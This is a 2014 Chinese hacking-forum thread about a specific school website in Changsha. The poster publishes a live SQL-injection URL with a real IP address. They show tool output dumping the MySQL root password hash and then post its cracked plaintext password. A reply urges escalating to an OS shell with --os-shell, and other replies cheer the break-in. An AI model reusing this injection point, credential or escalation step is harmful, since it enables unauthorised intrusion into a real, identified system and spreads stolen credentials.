net1user 发表于 2014-8-8 05:51:01

长沙市雅礼先锋网SQL注入漏洞

尼玛管理干嘛去了 root权限。。。。。

注入点:http://218.77.114.11:8088/detail_show.php?id=311 这站看都不要看;随便找条尼玛全站都射点哪射哪。






既然是root直接点~   http://218.77.114.11:8088/detail_show.php?id=311 --passwords -v 0    {:soso_e141:} {:soso_e141:}
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL 5.0
resumed: root
resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6
resumed: root
resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6
resumed:
resumed:
resumed: root
resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6



查询结果:
Justdoit2013@


nerd 发表于 2014-8-8 13:22:34

:o:o新人帮顶,运气真好

lyrric 发表于 2014-8-8 14:22:42

你们用的那个工具是啥啊?

phantomer 发表于 2014-8-8 17:48:20

继续日下去。
--os-shell

神风 发表于 2014-8-10 13:35:17

给力;;P   
页: [1]
查看完整版本: 长沙市雅礼先锋网SQL注入漏洞